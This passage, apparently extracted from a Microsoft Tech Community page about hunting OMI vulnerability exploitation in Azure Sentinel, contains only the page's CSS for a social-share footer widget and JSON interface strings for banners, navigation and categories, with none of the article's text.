1083px) {\\r\\n display: flex;\\r\\n flex-wrap:\r\nwrap;\\r\\n padding: 1.875rem 1.5rem 1rem;\\r\\n }\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share_qp4x5_281 {\\r\\n\r\nposition: fixed;\\r\\n top: 60%;\\r\\n transform: translateY(-50%);\\r\\n left: 0;\\r\\n z-index:\r\n1000;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 {\\r\\n list-style: none;\\r\\n padding: 0;\\r\\n\r\nmargin: 0;\\r\\n display: block;\\r\\n flex-direction: column;\\r\\n background-color: white;\\r\\n width: 3.125rem;\\r\\n border-radius: 0 0.4375rem 0.4375rem 0;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317 {\\r\\n border-top-right-radius: 7px;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317:hover {\\r\\n border-radius:\r\n0;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-email-image_qp4x5_331:hover {\\r\\n border-radius:\r\n0;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339:hover\r\n.custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317 {\\r\\n border-radius:\r\n0;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339:hover .custom_widget_MicrosoftFooter_social-share-email-image_qp4x5_331 {\\r\\n border-radius: 0;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339 img {\\r\\n width: 1.875rem;\\r\\n height: auto;\\r\\n transition: filter 0.3s\r\nease;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list_qp4x5_365 {\\r\\n width:\r\n3.125rem;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-rss-image_qp4x5_371 {\\r\\n width: 1.875rem;\\r\\n height:\r\nauto;\\r\\n transition: filter 0.3s ease;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li {\\r\\n width:\r\n3.125rem;\\r\\n height: 3.125rem;\\r\\n padding: 0.5rem;\\r\\n box-sizing: border-box;\\r\\n border: 2px solid white;\\r\\n display:\r\ninline-block;\\r\\n text-align: center;\\r\\n opacity: 1;\\r\\n visibility: visible;\\r\\n transition: border 0.3s ease; /* Smooth transition\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 32 of 38\n\neffect */\\r\\n border-left: none;\\r\\n border-bottom: none; /* Apply bottom border to only last item\r\n*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-linkedin_qp4x5_411 {\\r\\n background-color: #0474b4;\\r\\n\r\nborder-top-right-radius: 5px; /* Rounded top right corner of first item*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-facebook_qp4x5_419 {\\r\\n background-color: #3c5c9c;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-xicon_qp4x5_425 {\\r\\n background-color: #000;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-reddit_qp4x5_431 {\\r\\n background-color: #fc4404;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-bluesky_qp4x5_437 {\\r\\n background-color: #f0f2f5;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-rss_qp4x5_443 {\\r\\n background-color: #ec7b1c;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449 {\\r\\n background-color: #848484;\\r\\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of\r\nlast item*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449 {\\r\\n border-bottom: 2px solid white; /* Add bottom border only to the last item */\\r\\n height:\r\n3.25rem; /* Increase last child height to make in align with the hover label */\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_x-icon_qp4x5_465 {\\r\\n filter: invert(100%);\\r\\n transition: filter 0.3s ease;\\r\\n width: 1.25rem !important;\\r\\n height: auto;\\r\\n\r\npadding-top: 0.3125rem !important;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_bluesky-icon_qp4x5_479 {\\r\\n filter:\r\ninvert(20%) sepia(100%) saturate(3000%) hue-rotate(180deg);\\r\\n transition: filter 0.3s ease;\\r\\n padding-top: 0.3125rem\r\n!important;\\r\\n width: 1.5625rem !important;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_share-icon_qp4x5_493 {\\r\\n border:\r\n2px solid transparent;\\r\\n display: inline-block;\\r\\n position: relative;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li:hover {\\r\\n border: 2px solid white;\\r\\n border-left: none;\\r\\n border-bottom: none;\\r\\n border-radius:\r\n0;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li.custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449:hover {\\r\\n border-bottom: 2px solid white; /* Add bottom border only to the last item\r\n*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_sharing-options_qp4x5_297 li:hover\r\n.custom_widget_MicrosoftFooter_label_qp4x5_525 {\\r\\n opacity: 1;\\r\\n visibility: visible;\\r\\n border: 2px solid white;\\r\\n\r\nbox-sizing: border-box;\\r\\n border-left: none;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_label_qp4x5_525 {\\r\\n position:\r\nabsolute;\\r\\n left: 100%;\\r\\n white-space: nowrap;\\r\\n opacity: 0;\\r\\n visibility: hidden;\\r\\n transition: all 0.2s ease;\\r\\n color:\r\nwhite;\\r\\n border-radius: 0 10 0 0.625rem;\\r\\n top: 50%;\\r\\n transform: translateY(-50%);\\r\\n height: 3.25rem;\\r\\n display:\r\nflex;\\r\\n align-items: center;\\r\\n justify-content: center;\\r\\n padding: 0.625rem 0.75rem 0.9375rem 0.5rem;\\r\\n border: 2px\r\nsolid white;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_linkedin_qp4x5_317 {\\r\\n background-color: #0474b4;\\r\\n border-top-right-radius: 5px; /* Rounded top right corner of first\r\nitem*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_facebook_qp4x5_585 {\\r\\n background-color:\r\n#3c5c9c;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_twitter_qp4x5_591 {\\r\\n background-color: black;\\r\\n color:\r\nwhite;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_reddit_qp4x5_599 {\\r\\n background-color:\r\n#fc4404;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_mail_qp4x5_605 {\\r\\n background-color: #848484;\\r\\n border-bottom-right-radius: 5px; /* Rounded bottom right corner of last\r\nitem*/\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_bluesky_qp4x5_479 {\\r\\n background-color: #f0f2f5;\\r\\n color:\r\nblack;\\r\\n}\\r\\n.custom_widget_MicrosoftFooter_rss_qp4x5_621 {\\r\\n background-color: #ec7b1c;\\r\\n}\\r\\n@media (max-width: 991px) {\\r\\n .custom_widget_MicrosoftFooter_social-share_qp4x5_281 {\\r\\n display: none;\\r\\n }\\r\\n}\\r\\n\",\"tokens\":\r\n{\"context-uhf\":\"custom_widget_MicrosoftFooter_context-uhf_qp4x5_1\",\"c-uhff-link\":\"custom_widget_MicrosoftFooter_c-uhff-link_qp4x5_23\",\"c-uhff\":\"custom_widget_MicrosoftFooter_c-uhff_qp4x5_23\",\"c-uhff-nav\":\"custom_widget_MicrosoftFooter_c-uhff-nav_qp4x5_69\",\"c-heading-4\":\"custom_widget_MicrosoftFooter_c-heading-4_qp4x5_97\",\"c-uhff-nav-row\":\"custom_widget_MicrosoftFooter_c-uhff-nav-row_qp4x5_113\",\"c-uhff-nav-group\":\"custom_widget_MicrosoftFooter_c-uhff-nav-group_qp4x5_115\",\"c-list\":\"custom_widget_MicrosoftFooter_c-list_qp4x5_155\",\"f-bare\":\"custom_widget_MicrosoftFooter_f-bare_qp4x5_155\",\"c-uhff-base\":\"custom_widget_MicrosoftFooter_c-uhff-base_qp4x5_187\",\"c-uhff-ccpa\":\"custom_widget_MicrosoftFooter_c-uhff-ccpa_qp4x5_213\",\"c-uhff-consumer\":\"custom_widget_MicrosoftFooter_c-uhff-consumer_qp4x5_215\",\"social-share\":\"custom_widget_MicrosoftFooter_social-share_qp4x5_281\",\"sharing-options\":\"custom_widget_MicrosoftFooter_sharing-options_qp4x5_297\",\"linkedin-icon\":\"custom_widget_MicrosoftFooter_linkedin-icon_qp4x5_317\",\"social-share-email-image\":\"custom_widget_MicrosoftFooter_social-share-email-image_qp4x5_331\",\"social-link-footer\":\"custom_widget_MicrosoftFooter_social-link-footer_qp4x5_339\",\"social-share-list\":\"custom_widget_MicrosoftFooter_social-share-list_qp4x5_365\",\"social-share-rss-image\":\"custom_widget_MicrosoftFooter_social-share-rss-image_qp4x5_371\",\"social-share-list-linkedin\":\"custom_widget_MicrosoftFooter_social-share-list-linkedin_qp4x5_411\",\"social-share-list-facebook\":\"custom_widget_MicrosoftFooter_social-share-list-facebook_qp4x5_419\",\"social-share-list-xicon\":\"custom_widget_MicrosoftFooter_social-share-list-xicon_qp4x5_425\",\"social-share-list-reddit\":\"custom_widget_MicrosoftFooter_social-share-list-reddit_qp4x5_431\",\"social-share-list-bluesky\":\"custom_widget_MicrosoftFooter_social-share-list-bluesky_qp4x5_437\",\"social-share-list-rss\":\"custom_widget_MicrosoftFooter_social-share-list-rss_qp4x5_443\",\"social-share-list-mail\":\"custom_widget_MicrosoftFooter_social-share-list-mail_qp4x5_449\",\"x-icon\":\"custom_widget_MicrosoftFooter_x-icon_qp4x5_465\",\"bluesky-icon\":\"custom_widget_MicrosoftFooter_bluesky-icon_qp4x5_479\",\"share-icon\":\"custom_widget_MicrosoftFooter_share-icon_qp4x5_493\",\"label\":\"custom_widget_MicrosoftFooter_label_qp4x5_525\",\"linkedin\":\"custom_widget_MicrosoftFooter_linkedin_qp4x5_317\",\"faceb\r\ncomponents/community/Breadcrumb-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/Breadcrumb-1775111751222\",\"value\":{\"navLabel\":\"Breadcrumbs\",\"dropdown\":\"Additional parent\r\npage navigation\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageBanner-https://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 33 of 38\n\n1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageBanner-1775111751222\",\"value\":{\"messageMarkedAsSpam\":\"This post has been marked as\r\nspam\",\"messageMarkedAsSpam@board:TKB\":\"This article has been marked as\r\nspam\",\"messageMarkedAsSpam@board:BLOG\":\"This post has been marked as\r\nspam\",\"messageMarkedAsSpam@board:FORUM\":\"This discussion has been marked as\r\nspam\",\"messageMarkedAsSpam@board:OCCASION\":\"This event has been marked as\r\nspam\",\"messageMarkedAsSpam@board:IDEA\":\"This idea has been marked as spam\",\"manageSpam\":\"Manage\r\nSpam\",\"messageMarkedAsAbuse\":\"This post has been marked as abuse\",\"messageMarkedAsAbuse@board:TKB\":\"This\r\narticle has been marked as abuse\",\"messageMarkedAsAbuse@board:BLOG\":\"This post has been marked as\r\nabuse\",\"messageMarkedAsAbuse@board:FORUM\":\"This discussion has been marked as\r\nabuse\",\"messageMarkedAsAbuse@board:OCCASION\":\"This event has been marked as\r\nabuse\",\"messageMarkedAsAbuse@board:IDEA\":\"This idea has been marked as\r\nabuse\",\"preModCommentAuthorText\":\"This comment will be published as soon as it is\r\napproved\",\"preModCommentModeratorText\":\"This comment is awaiting moderation\",\"messageMarkedAsOther\":\"This post\r\nhas been rejected due to other reasons\",\"messageMarkedAsOther@board:TKB\":\"This article has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:BLOG\":\"This post has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:FORUM\":\"This discussion has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:OCCASION\":\"This event has been rejected due to other\r\nreasons\",\"messageMarkedAsOther@board:IDEA\":\"This idea has been rejected due to other\r\nreasons\",\"messageArchived\":\"This post was archived on {date}\",\"relatedUrl\":\"View Related\r\nContent\",\"relatedContentText\":\"Showing related content\",\"archivedContentLink\":\"View Archived\r\nContent\"},\"localOverride\":false},\"Category:category:Exchange\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Exchange\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Outlook\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Outlook\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Community-Info-Center\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Community-Info-Center\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:EducationSector\":\r\n{\"__typename\":\"Category\",\"id\":\"category:EducationSector\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:DrivingAdoption\":\r\n{\"__typename\":\"Category\",\"id\":\"category:DrivingAdoption\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Azure\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Azure\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Windows-Server\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Windows-Server\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:MicrosoftTeams\":\r\n{\"__typename\":\"Category\",\"id\":\"category:MicrosoftTeams\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:PublicSector\":\r\n{\"__typename\":\"Category\",\"id\":\"category:PublicSector\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoft365\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoft365\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:IoT\":\r\n{\"__typename\":\"Category\",\"id\":\"category:IoT\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:HealthcareAndLifeSciences\":\r\n{\"__typename\":\"Category\",\"id\":\"category:HealthcareAndLifeSciences\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:ITOpsTalk\":\r\n{\"__typename\":\"Category\",\"id\":\"category:ITOpsTalk\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:MicrosoftMechanics\":\r\n{\"__typename\":\"Category\",\"id\":\"category:MicrosoftMechanics\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:MicrosoftforNonprofits\":\r\n{\"__typename\":\"Category\",\"id\":\"category:MicrosoftforNonprofits\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:PartnerCommunity\":\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 34 of 38\n\n{\"__typename\":\"Category\",\"id\":\"category:PartnerCommunity\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Microsoft365Copilot\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Microsoft365Copilot\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Windows\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Windows\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:Content_Management\":\r\n{\"__typename\":\"Category\",\"id\":\"category:Content_Management\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:CommunityNewsDesk\":\r\n{\"__typename\":\"Category\",\"id\":\"category:CommunityNewsDesk\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoft-learn-for-educators\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoft-learn-for-educators\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:mvp\":\r\n{\"__typename\":\"Category\",\"id\":\"category:mvp\",\"categoryPolicies\":{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoftintune\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoftintune\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:microsoft-global-community-initiative\":\r\n{\"__typename\":\"Category\",\"id\":\"category:microsoft-global-community-initiative\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:usergroups\":\r\n{\"__typename\":\"Category\",\"id\":\"category:usergroups\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Category:category:skills-hub\":\r\n{\"__typename\":\"Category\",\"id\":\"category:skills-hub\",\"categoryPolicies\":\r\n{\"__typename\":\"CategoryPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"Blog:board:skills-hub-blog\":\r\n{\"__typename\":\"Blog\",\"id\":\"board:skills-hub-blog\",\"blogPolicies\":{\"__typename\":\"BlogPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}},\"boardPolicies\":{\"__typename\":\"BoardPolicies\",\"canReadNode\":\r\n{\"__typename\":\"PolicyResult\",\"failureReason\":null}}},\"CachedAsset:text:en_US-components/community/Navbar-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/Navbar-1775111751222\",\"value\":{\"community\":\"Community Home\",\"inbox\":\"Inbox\",\"manageContent\":\"Manage\r\nContent\",\"tos\":\"Terms of Service\",\"forgotPassword\":\"Forgot Password\",\"themeEditor\":\"Theme Editor\",\"edit\":\"Edit\r\nNavigation Bar\",\"skipContent\":\"Skip to content\",\"gxcuf89792\":\"Tech Community\",\"windows-server\":\"Windows\r\nServer\",\"ms-learn-ext-security\":\"Microsoft Security\",\"Common_Enntvz-i-t-ops-talk-link\":\"ITOps Talk\",\"education-sector\":\"Education Sector\",\"Common-external-link-9\":\"Microsoft 365\",\"Common-external-link-8\":\"Dynamics\r\n365\",\"Common-external-link-7\":\"Skilling Room Directory\",\"Common-external-link-6\":\"Events\",\"Common-external-link-5\":\"Blogs\",\"Common-external-link-4\":\"View All\",\"Common-gxcuf89792-community\":\"Community\",\"Common-external-link-3\":\"Topics\",\"microsoft365\":\"Microsoft 365\",\"Common_Enntvz-community-news-desk-link\":\"Community News\r\nDesk\",\"Common_Enntvz-azure-link\":\"Azure\",\"Common-community-info-center-link\":\"Lounge\",\"azure\":\"Azure\",\"Common_Enntvz-windows-link\":\"Windows\",\"Common_Enntvz-education-sector-link\":\"Education Sector\",\"Common-windows-server-link\":\"Windows Server\",\"products-link\":\"Products\",\"Common_Enntvz-partner-community-link\":\"Microsoft Partner Community\",\"microsoft-learn-blog\":\"Blog\",\"Common-external-link-2\":\"View All\",\"community-hub-link\":\"Community Hubs\",\"Common-mvp-link\":\"Microsoft MVP Program\",\"community-info-center\":\"Lounge\",\"microsoft-endpoint-manager\":\"Microsoft\r\nIntune\",\"startupsat-microsoft\":\"Startups at Microsoft\",\"ms-learn-ext-azure\":\"Azure\",\"Common_Enntvz-content_management-link\":\"Content Management\",\"ms-learn-ext-github\":\"Github\",\"Common-microsoft365-\r\nlink\":\"Microsoft 365\",\"Common-i-t-ops-talk-link\":\"ITOps Talk\",\"Common_Enntvz-view-all-products-link\":\"View\r\nAll\",\"Common-microsoft-global-community-initiative-link\":\"Microsoft Global Community Initiative (MGCI)\",\"all-events-link\":\"Events\",\"Common_Enntvz-microsoft-learn-for-educators-link\":\"Microsoft Learn for Educators\",\"Common-external-link\":\"Community Hubs\",\"Common-partner-community-link\":\"Microsoft Partner Community\",\"Common-microsoft-learn-for-educators-link\":\"Microsoft Learn for Educators\",\"Common_Enntvz-microsoft-teams-link\":\"Microsoft Teams\",\"driving-adoption\":\"Driving Adoption\",\"microsoft-learn\":\"Microsoft Learn\",\"Common-healthcare-and-life-sciences-link\":\"Healthcare and Life Sciences\",\"planner\":\"Outlook\",\"Common_Enntvz-exchange-link\":\"Exchange\",\"healthcare-and-life-sciences\":\"Healthcare and Life Sciences\",\"Common-external-link-10\":\"View All\",\"Common-driving-adoption-link\":\"Driving Adoption\",\"ms-learn-ext-pp\":\"Power Platform\",\"Common_Enntvz-windows-server-link\":\"Windows\r\nServer\",\"Common-io-t-link\":\"Internet of Things (IoT)\",\"Skills-Hub\":\"Skills Hub\",\"microsoft-teams\":\"Microsoft\r\nTeams\",\"Common-outlook-link\":\"Outlook\",\"Common_Enntvz-public-sector-link\":\"Public Sector\",\"Common-windows-link\":\"Windows\",\"all-blogs-link\":\"Blogs\",\"communities\":\"Products\",\"Common_Enntvz-usergroups-link\":\"User\r\nhttps://techcommunity.microsoft.com/t5/azure-sentinel/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\r\nPage 35 of 38\n\nGroups\",\"Common_Enntvz-microsoft-global-community-initiative-link\":\"Microsoft Global Community Initiative\r\n(MGCI)\",\"Skills-Hub-link\":\"Community\",\"Common_Enntvz-io-t-link\":\"Internet of Things (IoT)\",\"ms-learn-ext-m365\":\"Microsoft 365\",\"Common_Enntvz-microsoft-mechanics-link\":\"Microsoft Mechanics\",\"microsoft-learn-community\":\"Community\",\"partner-community\":\"Microsoft Partner Community\",\"Common-microsoft-mechanics-link\":\"Microsoft Mechanics\",\"Common_Enntvz-healthcare-and-life-sciences-link\":\"Healthcare and Life\r\nSciences\",\"microsoft-mechanics\":\"Microsoft Mechanics\",\"Common-microsoft-security-link\":\"Microsoft\r\nSecurity\",\"Common-education-sector-link\":\"Education Sector\",\"Skills-Hub-Blog\":\"Blog\",\"i-t-ops-talk\":\"ITOps\r\nTalk\",\"microsoft-securityand-compliance\":\"Microsoft Security\",\"Common_Enntvz-microsoftintune-link\":\"Microsoft\r\nIntune\",\"Common-azure-link\":\"Azure\",\"Common-microsoftintune-link\":\"Microsoft Intune\",\"Common_Enntvz-view-all-topics-link\":\"View All\",\"Common-usergroups-link\":\"User Groups\",\"Common-public-sector-link\":\"Public\r\nSector\",\"Common_Enntvz-microsoft-security-link\":\"Microsoft Security\",\"Common_Enntvz-outlook-link\":\"Outlook\",\"Common_Enntvz-mvp-link\":\"Microsoft MVP Program\",\"exchange\":\"Exchange\",\"topics-link\":\"Topics\",\"io-t\":\"Internet of Things (IoT)\",\"Common-microsoft365-copilot-link\":\"Microsoft 365 Copilot\",\"Common-microsoft-teams-link\":\"Microsoft Teams\",\"s-m-b\":\"Nonprofit Community\",\"Common_Enntvz-community-info-center-link\":\"Lounge\",\"Common_Enntvz-microsoft365-copilot-link\":\"Microsoft 365 Copilot\",\"Common_Enntvz-microsoftfor-nonprofits-link\":\"Nonprofit Community\",\"Common_Enntvz-microsoft365-link\":\"Microsoft 365\",\"Common-content_management-link\":\"Content Management\",\"ms-learn-ext-teams\":\"Teams\",\"s-q-l-server\":\"Content\r\nManagement\",\"products-services\":\"Products\",\"Common-community-news-desk-link\":\"Community News Desk\",\"ms-learn-ext-LD\":\"Skilling Room Directory\",\"Common-exchange-link\":\"Exchange\",\"Common-gxcuf89792-link\":\"Tech\r\nCommunity\",\"windows\":\"Windows\",\"public-sector\":\"Public Sector\",\"Common_Enntvz-driving-adoption-link\":\"Driving\r\nAdoption\",\"Common-microsoftfor-nonprofits-link\":\"Nonprofit Community\",\"ms-learn-ext-net\":\".NET\",\"ms-learn-ext-dynamics\":\"Dynamics 365\",\"a-i\":\"AI and Machine Learning\",\"outlook\":\"Microsoft 365\r\nCopilot\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/community/NavbarHamburgerDropdown-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/NavbarHamburgerDropdown-1775111751222\",\"value\":{\"hamburgerLabelOpen\":\"Open Side Menu\",\"hamburgerLabelClose\":\"Close Side\r\nMenu\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/community/BrandLogo-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/BrandLogo-1775111751222\",\"value\":\r\n{\"logoAlt\":\"Khoros\",\"themeLogoAlt\":\"Brand Logo\",\"linkAriaLabel\":\"Go to community home\r\npage\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/community/NavbarTextLinks-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/community/NavbarTextLinks-1775111751222\",\"value\":\r\n{\"more\":\"More\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/search/SpotlightSearchIcon-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/search/SpotlightSearchIcon-1775111751222\",\"value\":{\"search\":\"Search\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/authentication/AuthenticationLink-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/authentication/AuthenticationLink-1775111751222\",\"value\":{\"title.login\":\"Sign\r\nIn\",\"title.registration\":\"Register\",\"title.forgotPassword\":\"Forgot Password\",\"title.multiAuthLogin\":\"Sign\r\nIn\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/nodes/NodeLink-1775111751222\":\r\n{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/nodes/NodeLink-1775111751222\",\"value\":{\"place\":\"Go back\r\nto {name}\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageView/MessageViewStandard-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageView/MessageViewStandard-1775111751222\",\"value\":\r\n{\"anonymous\":\"Anonymous\",\"author\":\"{messageAuthorLogin}\",\"authorBy\":\"{messageAuthorLogin}\",\"board\":\"\r\n{messageBoardTitle}\",\"replyToUser\":\" to {parentAuthor}\",\"showMoreReplies\":\"Show\r\nMore\",\"replyText\":\"Reply\",\"repliesText\":\"Replies\",\"markedAsSolved\":\"Marked as Solution\",\"messageStatus\":\"Status:\r\n\",\"statusChanged\":\"Status changed: {previousStatus} to {currentStatus}\",\"statusAdded\":\"Status added:\r\n{status}\",\"statusRemoved\":\"Status removed: {status}\",\"labelExpand\":\"expand replies\",\"labelCollapse\":\"collapse\r\nreplies\",\"unhelpfulReason.reason1\":\"Content is outdated\",\"unhelpfulReason.reason2\":\"Article is missing\r\ninformation\",\"unhelpfulReason.reason3\":\"Content is for a different Product\",\"unhelpfulReason.reason4\":\"Doesn't match\r\nwhat I was searching for\"},\"localOverride\":false},\"CachedAsset:text:en_US-components/messages/MessageReplyCallToAction-1775111751222\":{\"__typename\":\"CachedAsset\",\"id\":\"text:en_US-components/messages/MessageReplyCallToAction-1775111751222\",\"value\":{\"leaveReply\":\"Leave a\r\nreply...\",\"leaveReply@board:BLOG@message:root\":\"Leave a\r\ncomment...\",\"leaveReply@board:TKB@message:root\":\"Leave a\r\ncomment...\",\"leaveReply@board:IDEA@message:root\":\"Leave a\r\ncomment...\",\"leaveReply@board:OCCASION@message:root\":\"Leave a comment...\",\"repliesTurnedOff.FORUM\":\"Replies\r\nare turned off for this topic\",\"repliesTurnedOff.BLOG\":\"Comments are turned off for 